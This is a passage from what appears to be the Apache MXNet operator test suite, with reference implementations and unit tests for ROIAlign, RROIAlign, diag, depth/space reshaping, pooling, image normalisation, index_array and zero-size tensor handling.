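        # For every RoI: split it into PH x PW bins, take a regular grid of sampling
        # points per bin, bilinearly interpolate the feature map at each point and
        # average; the gradient is accumulated through the same interpolation weights.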
for r in range(R):
batch_ind = int(rois[r, 0])
sw, sh, ew, eh = rois[r, 1:5] * T(spatial_scale)
roi_w = T(max(ew - sw, 1.0))
roi_h = T(max(eh - sh, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
for c in range(C_out):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
c_in = c * PH * PW + ph * PW + pw if position_sensitive else c
for iy in range(roi_bin_grid_h):
y = sh + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
x = sw + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
v, g = bilinear_interpolate(
bdata[c_in], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
# compute grad
for qy, qx, qw in g:
assert_same_dtype(qw.dtype, T)
dx[batch_ind, c_in, qy, qx] += dy[r,
c, ph, pw] * qw / count
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out, [dx, drois]
def test_roi_align_value(sampling_ratio=0, position_sensitive=False):
ctx = default_context()
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
C = C * pooled_size[0] * pooled_size[1] if position_sensitive else C
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy - wh / 2, center_xy + wh / 2, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
data.attach_grad()
rois.attach_grad()
with mx.autograd.record():
output = mx.nd.contrib.ROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sample_ratio=sampling_ratio,
position_sensitive=position_sensitive)
C_out = C // pooled_size[0] // pooled_size[1] if position_sensitive else C
dy = mx.nd.random.uniform(-1, 1, (R, C_out) +
pooled_size, ctx=ctx, dtype=dtype)
output.backward(dy)
real_output, [dx, drois] = roialign_forward_backward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio,
position_sensitive, dy.asnumpy())
assert_almost_equal(output, real_output, atol=1e-3)
assert_almost_equal(data.grad, dx, atol=1e-3)
assert_almost_equal(rois.grad, drois, atol=1e-3)
# modified from test_roipooling()
def test_roi_align_autograd(sampling_ratio=0):
ctx = default_context()
data = mx.symbol.Variable(name='data')
rois = mx.symbol.Variable(name='rois')
test = mx.symbol.contrib.ROIAlign(data=data, rois=rois, pooled_size=(4, 4), spatial_scale=1,
sample_ratio=sampling_ratio)
x1 = np.random.rand(4, 1, 12, 12).astype('float64')
x2 = np.array([[0, 1.1, 1.1, 6.2, 6.2], [2, 6.1, 2.1, 8.2, 11.2],
[1, 3.1, 1.1, 5.2, 10.2]], dtype='float64')
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'write', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
check_numeric_gradient(sym=test, location=[x1, x2],
grad_nodes={'data': 'add', 'rois': 'null'},
numeric_eps=1e-4, rtol=1e-1, atol=1e-4, ctx=ctx)
test_roi_align_value()
test_roi_align_value(sampling_ratio=2)
test_roi_align_value(position_sensitive=True)
test_roi_align_autograd()
def test_op_rroi_align():
T = np.float32
def assert_same_dtype(dtype_a, dtype_b):
'''
        Assert that the two data types are the same
Parameters
----------
dtype_a, dtype_b: type
Input data types to compare
'''
assert dtype_a == dtype_b,\
TypeError('Unmatched data types: %s vs %s' % (dtype_a, dtype_b))
def bilinear_interpolate(bottom, height, width, y, x):
if y < -1.0 or y > height or x < -1.0 or x > width:
return T(0.0)
x = T(max(0.0, x))
y = T(max(0.0, y))
x_low = int(x)
y_low = int(y)
if x_low >= width - 1:
x_low = x_high = width - 1
x = T(x_low)
else:
x_high = x_low + 1
if y_low >= height - 1:
y_low = y_high = height - 1
y = T(y_low)
else:
y_high = y_low + 1
ly = y - T(y_low)
lx = x - T(x_low)
hy = T(1.0) - ly
hx = T(1.0) - lx
v1 = bottom[y_low, x_low]
v2 = bottom[y_low, x_high]
v3 = bottom[y_high, x_low]
v4 = bottom[y_high, x_high]
w1 = hy * hx
w2 = hy * lx
w3 = ly * hx
w4 = ly * lx
assert_same_dtype(w1.dtype, T)
assert_same_dtype(w2.dtype, T)
assert_same_dtype(w3.dtype, T)
assert_same_dtype(w4.dtype, T)
val = w1 * v1 + w2 * v2 + w3 * v3 + w4 * v4
assert_same_dtype(val.dtype, T)
return val
def rroialign_forward(data, rois, pooled_size, spatial_scale, sampling_ratio):
N, C, H, W = data.shape
R = rois.shape[0]
PH, PW = pooled_size
assert rois.ndim == 2,\
ValueError(
'The ndim of rois should be 2 rather than %d' % rois.ndim)
assert rois.shape[1] == 6,\
ValueError(
'The length of the axis 1 of rois should be 6 rather than %d' % rois.shape[1])
assert_same_dtype(data.dtype, T)
assert_same_dtype(rois.dtype, T)
out = np.zeros((R, C, PH, PW), dtype=T)
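        # Same bin/sampling-grid scheme as ROIAlign, except each sampling point is
        # rotated by the RoI angle around the RoI centre before the bilinear lookup.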
for r in range(R):
batch_ind = int(rois[r, 0])
roi_center_w, roi_center_h, roi_w, roi_h = rois[r, 1:5] * T(spatial_scale)
roi_theta = T(rois[r,5] * np.pi / 180.0)
roi_w = T(max(roi_w, 1.0))
roi_h = T(max(roi_h, 1.0))
bin_h = roi_h / T(PH)
bin_w = roi_w / T(PW)
bdata = data[batch_ind]
if sampling_ratio > 0:
roi_bin_grid_h = roi_bin_grid_w = sampling_ratio
else:
roi_bin_grid_h = int(np.ceil(roi_h / T(PH)))
roi_bin_grid_w = int(np.ceil(roi_w / T(PW)))
count = T(roi_bin_grid_h * roi_bin_grid_w)
roi_start_h = T(-roi_h / 2.0)
roi_start_w = T(-roi_w / 2.0)
for c in range(C):
for ph in range(PH):
for pw in range(PW):
val = T(0.0)
for iy in range(roi_bin_grid_h):
yy = roi_start_h + T(ph) * bin_h + (T(iy) + T(0.5)) * \
bin_h / T(roi_bin_grid_h)
for ix in range(roi_bin_grid_w):
xx = roi_start_w + T(pw) * bin_w + (T(ix) + T(0.5)) * \
bin_w / T(roi_bin_grid_w)
x = xx * np.cos(roi_theta, dtype=T) + yy * np.sin(roi_theta, dtype=T) + roi_center_w
y = yy * np.cos(roi_theta, dtype=T) - xx * np.sin(roi_theta, dtype=T) + roi_center_h
v = bilinear_interpolate(
bdata[c], H, W, y, x)
assert_same_dtype(v.dtype, T)
val += v
out[r, c, ph, pw] = val / count
assert_same_dtype(out.dtype, T)
return out
def test_rroi_align_value(sampling_ratio=-1):
ctx = default_context()
if ctx.device_type == 'gpu':
print('skipped testing rroi align for gpu since it is not supported yet')
return
dtype = np.float32
dlen = 224
N, C, H, W = 5, 3, 16, 16
R = 7
pooled_size = (3, 4)
spatial_scale = H * 1.0 / dlen
data = mx.nd.array(
np.arange(N * C * W * H).reshape((N, C, H, W)), ctx=ctx, dtype=dtype)
center_xy = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
wh = mx.nd.random.uniform(0, dlen, (R, 2), ctx=ctx, dtype=dtype)
theta = mx.nd.random.uniform(0, 180, (R,1), ctx=ctx, dtype=dtype)
batch_ind = mx.nd.array(np.random.randint(0, N, size=(R, 1)), ctx=ctx)
pos = mx.nd.concat(center_xy, wh, theta, dim=1)
rois = mx.nd.concat(batch_ind, pos, dim=1)
output = mx.nd.contrib.RROIAlign(data, rois, pooled_size=pooled_size,
spatial_scale=spatial_scale, sampling_ratio=sampling_ratio)
real_output = rroialign_forward(data.asnumpy(), rois.asnumpy(), pooled_size,
spatial_scale, sampling_ratio)
assert_almost_equal(output.asnumpy(), real_output, atol=1e-3)
test_rroi_align_value()
test_rroi_align_value(sampling_ratio=2)
def test_diag():
# Test 2d input
h = np.random.randint(2,9)
w = np.random.randint(2,9)
a_np = np.random.random((h, w)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
for k in [0, 1, -1, np.random.randint(-min(h,w) + 1, min(h,w))]:
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
# invalid k
k = max(h,w) + 1
assertRaises(MXNetError, mx.nd.diag, a, k=k)
# Test 2d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
# Test 2d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# test 1d input
d = np.random.randint(2,9)
a_np = np.random.random((d))
a = mx.nd.array(a_np)
# k is random
k = np.random.randint(-d,d)
assert_almost_equal(mx.nd.diag(a, k=k), np.diag(a_np, k=k))
    # Test 1d backward, k=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data)
check_numeric_gradient(diag_sym, [a_np])
    # Test 1d backward, k=1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1)
check_numeric_gradient(diag_sym, [a_np])
    # Test 1d backward, k=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d input
x1 = np.random.randint(3,9)
x2 = np.random.randint(3,9)
x3 = np.random.randint(3,9)
x4 = np.random.randint(3,9)
a_np = np.random.random((x1, x2, x3, x4)).astype(np.float32)
a = mx.nd.array(a_np).astype('float32')
# k = 0, axis1=0, axis2=1
r = mx.nd.diag(data=a, k=0, axis1=0, axis2=1)
assert_almost_equal(r, np.diagonal(a_np, offset=0, axis1=0, axis2=1))
# k = 1, axis1=1, axis2=0
r = mx.nd.diag(data=a, k=1, axis1=1, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=1, axis1=1, axis2=0))
    # k = -1, axis1=1, axis2=3
r = mx.nd.diag(data=a, k=-1, axis1=1, axis2=3)
assert_almost_equal(r, np.diagonal(a_np, offset=-1, axis1=1, axis2=3))
# k = 2, axis1=-2, axis2=0
r = mx.nd.diag(data=a, k=2, axis1=-2, axis2=0)
assert_almost_equal(r, np.diagonal(a_np, offset=2, axis1=-2, axis2=0))
# Test 4d backward, k=0, axis1=3, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=0, axis1=3, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=1, axis1=1, axis2=2
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=1, axis1=1, axis2=2)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-1, axis1=2, axis2=0
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-1, axis1=2, axis2=0)
check_numeric_gradient(diag_sym, [a_np])
# Test 4d backward, k=-2, axis1=1, axis2=-1
data = mx.sym.Variable('data')
diag_sym = mx.sym.diag(data=data, k=-2, axis1=1, axis2=-1)
check_numeric_gradient(diag_sym, [a_np])
@pytest.mark.serial
def test_depthtospace():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
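        # Reference depth_to_space: pull the two blocksize factors out of the channel
        # axis and interleave them into the height and width axes.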
tmp = np.reshape(x, [b, blocksize, blocksize, c // (blocksize**2), h, w])
tmp = np.transpose(tmp, [0, 3, 4, 1, 5, 2])
y = np.reshape(tmp, [b, c // (blocksize**2), h * blocksize, w * blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
n = random.randint(1, 5)
c = block * block * rand_mul1
h = random.randint(1, 5)
w = random.randint(1, 5)
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.depth_to_space(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c // (block ** 2), h * block, w * block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.depth_to_space(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_depth_dim():
invalid_shape_inp = (n, block - 1, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_space_dim():
invalid_shape_inp = (n, block ** 2, 0, block + 1)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n , c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.depth_to_space, data, block)
test_invalid_depth_dim()
test_invalid_space_dim()
test_invalid_block_size()
@pytest.mark.serial
def test_spacetodepth():
def f(x, blocksize):
b, c, h, w = x.shape[0], x.shape[1], x.shape[2], x.shape[3]
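        # Reference space_to_depth: fold blocksize x blocksize spatial tiles back into
        # the channel axis (the inverse of depth_to_space above).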
tmp = np.reshape(x, [b, c, h // blocksize, blocksize, w // blocksize, blocksize])
tmp = np.transpose(tmp, [0, 3, 5, 1, 2, 4])
y = np.reshape(tmp, [b, c * (blocksize**2), h // blocksize, w // blocksize])
return y
block = random.randint(2, 4)
rand_mul1 = random.randint(1, 4)
rand_mul2 = random.randint(1, 4)
n = random.randint(1, 5)
c = random.randint(1, 5)
h = block * rand_mul1
w = block * rand_mul2
shape_inp = (n, c, h, w)
data = rand_ndarray(shape_inp, 'default')
data_np = data.asnumpy()
expected = f(data_np, block)
output = mx.nd.space_to_depth(data, block)
assert_almost_equal(output, expected, atol=1e-3, rtol=1e-3)
shape_out = (n, c * (block ** 2), h // block, w // block)
data = mx.sym.Variable('data')
dts_sym = mx.sym.space_to_depth(data, block)
check_numeric_gradient(dts_sym, [np.ones(shape_inp)])
check_symbolic_forward(dts_sym, [data_np], [expected])
check_symbolic_backward(dts_sym, [data_np], [np.ones(shape_out)], [np.ones(shape_inp)])
def test_invalid_space_dim():
invalid_shape_inp = (n , c, block - 1, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_block_size():
block = 0
invalid_shape_inp = (n, c, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
def test_invalid_depth_dim():
invalid_shape_inp = (n, 0, h, w)
data = rand_ndarray(invalid_shape_inp, 'default')
assertRaises(MXNetError, mx.nd.space_to_depth, data, block)
test_invalid_space_dim()
test_invalid_block_size()
test_invalid_depth_dim()
def test_softmax_cross_entropy():
def f_sm_ce(data, label):
return np.sum(-np.log(data) * label)
data = mx.sym.Variable('data')
label = mx.sym.Variable('label')
sym = mx.sym.softmax_cross_entropy(data=data, label=label)
num_labels = random.randint(100, 200)
batch_size = random.randint(100, 200)
np_data = rand_ndarray((batch_size, num_labels), stype='default').asnumpy()
np_sm = np_softmax(np_data)
np_label = np.random.randint(0, num_labels, (batch_size, ))
np_one_hot_label = np.zeros((batch_size, num_labels))
np_one_hot_label[np.arange(batch_size), np_label] = 1.
check_symbolic_forward(sym, {'data' : np_data, 'label' : np_label}, [np.array([f_sm_ce(np_sm, np_one_hot_label)])], rtol=1e-3, atol=1e-5)
def test_split_v2():
dim = random.randint(2, 6)
shape = rand_shape_nd(dim)
axis = random.randint(-dim, dim-1)
axis_size = shape[axis]
samples = random.randint(0, axis_size - 1)
indices = sorted(random.sample([i for i in range(1, axis_size)], samples))
indices = tuple(indices)
mx_data = rand_ndarray(shape)
np_data = mx_data.asnumpy()
np_out = np.split(np_data, indices_or_sections=indices, axis=axis)
data = mx.sym.Variable("data")
sym = mx.sym.split_v2(data, indices_or_sections=indices, axis=axis)
check_symbolic_forward(sym, {"data": mx_data}, np_out, rtol=1e-3, atol=1e-5)
out_grad = [np.ones(arr.shape) for arr in np_out]
check_symbolic_backward(sym, {"data": mx_data}, out_grad, [np.concatenate(out_grad, axis=axis)])
def test_moments():
dim = random.randint(2, 5)
shape = rand_shape_nd(dim, dim=5)
axes = [i for i in range(dim)]
test_dims = random.sample(axes, random.randint(1, dim))
test_axes = tuple(sorted(test_dims))
np_a = np.random.uniform(-1.0, 1.0, shape)
a = mx.nd.array(np_a)
for keepdims in [True, False]:
eps = 1e-3
np_a[abs(np_a) < eps] = 2 * eps
np_mean = np.mean(np_a, axis=test_axes, keepdims=keepdims)
np_var = np.var(np_a, axis=test_axes, keepdims=keepdims)
mx_mean, mx_var = mx.nd.moments(a, keepdims=keepdims, axes=test_axes)
N = np_a.size / np_mean.size
mx_sym = mx.sym.Variable("data")
mx_moments = mx.sym.moments(mx_sym, axes=test_axes, keepdims=keepdims)
mx_test_sym = mx.sym.elemwise_add(mx_moments[0], mx_moments[1])
if len(np_mean.shape) == 0:
np_mean = np_mean.reshape(mx_mean.shape)
np_var = np_var.reshape(mx_var.shape)
assert np_mean.shape == mx_mean.shape
assert np_var.shape == mx_var.shape
check_symbolic_forward(mx_test_sym, [np_a], [np_mean + np_var], rtol=1e-3, atol=1e-5)
check_numeric_gradient(mx_test_sym, [np_a], numeric_eps=eps, rtol=1e-2, atol=2e-4)
def test_invalid_kernel_size():
invalid_kernel_size = 28
assert_exception(
mx.nd.Correlation,
MXNetError,
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=invalid_kernel_size)
def test_valid_kernel_size():
valid_kernel_size = 9
mx.nd.Correlation(
mx.nd.array(np.random.rand(1, 1, 28, 28)),
mx.nd.array(np.random.rand(1, 1, 28, 28)),
kernel_size=valid_kernel_size)
def test_valid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
output_data=mx.nd.Pooling(
input_data,
kernel=kernel,
stride=stride,
pad=(0,0,0),
pool_type='max',
name='pooling',
pooling_convention="same")
assert(math.ceil(input_data.shape[2]/stride) == output_data.shape[2])
def test_invalid_max_pooling_pad_type_same():
import math
input_data = mx.nd.array(np.random.rand(1,1,10))
stride = 2
kernel = 2
pad = 2
assert_exception(
mx.nd.Pooling,
MXNetError,
input_data,
stride=stride,
kernel=kernel,
pad=pad,
pool_type='max',
name='pooling',
pooling_convention="same")
@pytest.mark.serial
def test_image_normalize():
# Part 1 - Test 3D input with 3D mean/std
shape_3d = (3, 28, 28)
mean = (0, 1, 2)
std = (3, 2, 1)
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][0] = data_expected_3d[:][:][0] / 3.0
data_expected_3d[:][:][1] = (data_expected_3d[:][:][1] - 1.0) / 2.0
data_expected_3d[:][:][2] = data_expected_3d[:][:][2] - 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][0] = 1 / 3.0
grad_expected_3d[:][:][1] = 1 / 2.0
grad_expected_3d[:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 2 - Test 4D input with 3D mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[0][:][:][0] = data_expected_4d[0][:][:][0] / 3.0
data_expected_4d[0][:][:][1] = (data_expected_4d[0][:][:][1] - 1.0) / 2.0
data_expected_4d[0][:][:][2] = data_expected_4d[0][:][:][2] - 2.0
data_expected_4d[1][:][:][0] = data_expected_4d[1][:][:][0] / 3.0
data_expected_4d[1][:][:][1] = (data_expected_4d[1][:][:][1] - 1.0) / 2.0
data_expected_4d[1][:][:][2] = data_expected_4d[1][:][:][2] - 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[0][:][:][0] = 1 / 3.0
grad_expected_4d[0][:][:][1] = 1 / 2.0
grad_expected_4d[0][:][:][2] = 1 / 1.0
grad_expected_4d[1][:][:][0] = 1 / 3.0
grad_expected_4d[1][:][:][1] = 1 / 2.0
grad_expected_4d[1][:][:][2] = 1 / 1.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
# Part 3 - Test 3D input with scalar mean/std
shape_3d = (3, 28, 28)
mean = 1.0
std = 2.0
data_in_3d = mx.nd.random.uniform(0, 1, shape_3d)
data_expected_3d = data_in_3d.asnumpy()
data_expected_3d[:][:][:] = (data_expected_3d[:][:][:] - 1.0) / 2.0
data = mx.symbol.Variable('data')
img_norm_sym = mx.sym.image.normalize(data=data, mean=mean, std=std)
# check forward
check_symbolic_forward(img_norm_sym, [data_in_3d], [data_expected_3d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_3d = np.ones(shape_3d)
grad_expected_3d[:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_3d], out_grads=[mx.nd.ones(shape_3d)],
expected=[grad_expected_3d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_3d], atol=0.001)
# Part 4 - Test 4D input with scalar mean/std
shape_4d = (2, 3, 28, 28)
data_in_4d = mx.nd.random.uniform(0, 1, shape_4d)
data_expected_4d = data_in_4d.asnumpy()
data_expected_4d[:][:][:][:] = (data_expected_4d[:][:][:][:] - 1.0) / 2.0
# check forward
check_symbolic_forward(img_norm_sym, [data_in_4d], [data_expected_4d],
rtol=1e-5, atol=1e-5)
# Gradient is 1/std_dev
grad_expected_4d = np.ones(shape_4d)
grad_expected_4d[:][:][:][:] = 1 / 2.0
# check backward
check_symbolic_backward(img_norm_sym, location=[data_in_4d], out_grads=[mx.nd.ones(shape_4d)],
expected=[grad_expected_4d], rtol=1e-5, atol=1e-5)
# check backward using finite difference
check_numeric_gradient(img_norm_sym, [data_in_4d], atol=0.001)
@pytest.mark.serial
def test_index_array():
def test_index_array_default():
for shape in [(10,), (7, 5, 29), (5, 7, 11, 13, 17, 19)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(shape)
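            # index_array maps every element to its coordinate vector, so the expected
            # output is the stacked meshgrid of indices over the input shape.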
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_dim():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones(())
expected = np.zeros((0,))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_default_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data)
input_array = np.ones((0, 0, 0))
expected = np.zeros((0, 0, 0, 3))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
def test_index_array_select_axes():
shape = (5, 7, 11, 13, 17, 19)
for axes in [(3,), (4, 1), (5, 1, 3), (-1,), (-5, -1, -3)]:
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=axes)
input_array = np.ones(shape)
mgrid = np.mgrid[tuple(slice(0, x) for x in shape)]
expected = np.stack(mgrid, axis=-1)[..., axes]
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
@mx.use_np_shape
def test_index_array_select_axes_zero_size():
data = mx.symbol.Variable("data")
index_array = mx.sym.contrib.index_array(data, axes=(2, 1))
input_array = np.ones((0, 0, 0, 0))
expected = np.zeros((0, 0, 2))
check_symbolic_forward(index_array, [input_array], [expected])
check_symbolic_backward(index_array, [input_array], [np.ones(expected.shape)], [np.zeros_like(input_array)])
test_index_array_default()
test_index_array_default_zero_dim()
test_index_array_default_zero_size()
test_index_array_select_axes()
test_index_array_select_axes_zero_size()
def test_scalar_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=())
assertRaises(MXNetError, mx.nd.ones, shape=())
with mx.np_shape():
data_mx = mx.nd.ones(shape=())
data_np = np.ones((), dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
def test_zero_size_tensor_creation():
assertRaises(MXNetError, mx.nd.zeros, shape=(0, 1, 3, 0))
assertRaises(MXNetError, mx.nd.ones, shape=(0, 1, 3, 0))
with mx.np_shape():
data_mx = mx.nd.ones(shape=(0, 1, 0, 4))
data_np = np.ones(shape=data_mx.shape, dtype=data_mx.dtype)
assert same(data_mx.asnumpy(), data_np)
def test_concat_with_zero_size_tensor():
with mx.np_shape():
data1 = mx.nd.ones((0, 8, 12))
data2 = mx.nd.ones((3, 8, 12))
data3 = mx.nd.ones((0, 8, 12))
ret = mx.nd.Concat(data1, data2, data3, dim=0)
assert ret.shape == (3, 8, 12)
data1 = mx.nd.ones((0, 3, 10))
data2 = mx.nd.ones((0, 4, 10))
data3 = mx.nd.ones((0, 5, 10))
ret = mx.nd.Concat(data1, data2, data3, dim=1)
assert ret.shape == (0, 12, 10)
def test_np_shape_decorator():
@mx.use_np_shape
def check_scalar_one():
"""Generate scalar one tensor"""
return mx.nd.ones(shape=())
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
for active in [True, False]:
with mx.np_shape(active=active):
assert check_scalar_one.__name__ == "check_scalar_one"
assert check_scalar_one.__doc__ == "Generate scalar one tensor"
assert check_scalar_one().shape == ()
@mx.use_np_shape
def check_concat(shape1, shape2, axis):
data1 = mx.nd.ones(shape1)
data2 = mx.nd.ones(shape2)
ret = mx.nd.Concat(data1, data2, dim=axis)
expected_ret = np.concatenate((data1.asnumpy(), data2.asnumpy()), axis=axis)
assert ret.shape == expected_ret.shape
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
for active in [True, False]:
check_concat((0, 3, 4), (5, 3, 4), 0)
check_concat((8, 0, 5), (8, 7, 5), 1)
check_concat((8, 0, 0), (8, 0, 0), 2)
def test_add_n():
data_shape = (2, 2)
input_num = 5
data = [mx.nd.random.uniform(shape=data_shape) for i in range(input_num)]
rslt = mx.nd.zeros(shape=data_shape)
for i in range(input_num):
rslt += data[i]
add_n_rslt = mx.nd.add_n(*data, out=data[0])
assert_almost_equal(rslt.asnumpy(), add_n_rslt.asnumpy(), atol=1e-5)
def test_get_all_registered_operators():
ops = get_all_registered_operators()
assert isinstance(ops, list)
assert len(ops) > 0
assert 'Activation' in ops
def test_get_operator_arguments():
operator_arguments = get_operator_arguments('Activation')
assert isinstance(operator_arguments, OperatorArguments)
assert operator_arguments.names == ['data', 'act_type']
assert operator_arguments.types \
== ['NDArray-or-Symbol', "{'relu', 'sigmoid', 'softrelu', 'softsign', 'tanh'}, required"]
assert operator_arguments.narg == 2
def test_transpose_infer_shape_back():
o1 = mx.sym.ones(shape=[2,3])
o2 = mx.sym.ones(shape=[-1,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b._bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_transpose_infer_shape_mixed():
o1 = mx.sym.ones(shape=[2,-1])
o2 = mx.sym.ones(shape=[3,-1])
t = mx.sym.transpose(o2)
b = o1 + t
x = b._bind(mx.cpu(), args={})
y = x.forward()
assert(y[0].shape == (2,3))
def test_sample_normal_default_shape():
# Test case from https://github.com/apache/incubator-mxnet/issues/16135
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]))
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=())
assert s.shape == (1,)
s = mx.nd.sample_normal(mu=mx.nd.array([10.0]), sigma=mx.nd.array([0.5]), shape=1)
assert s.shape == (1, 1)
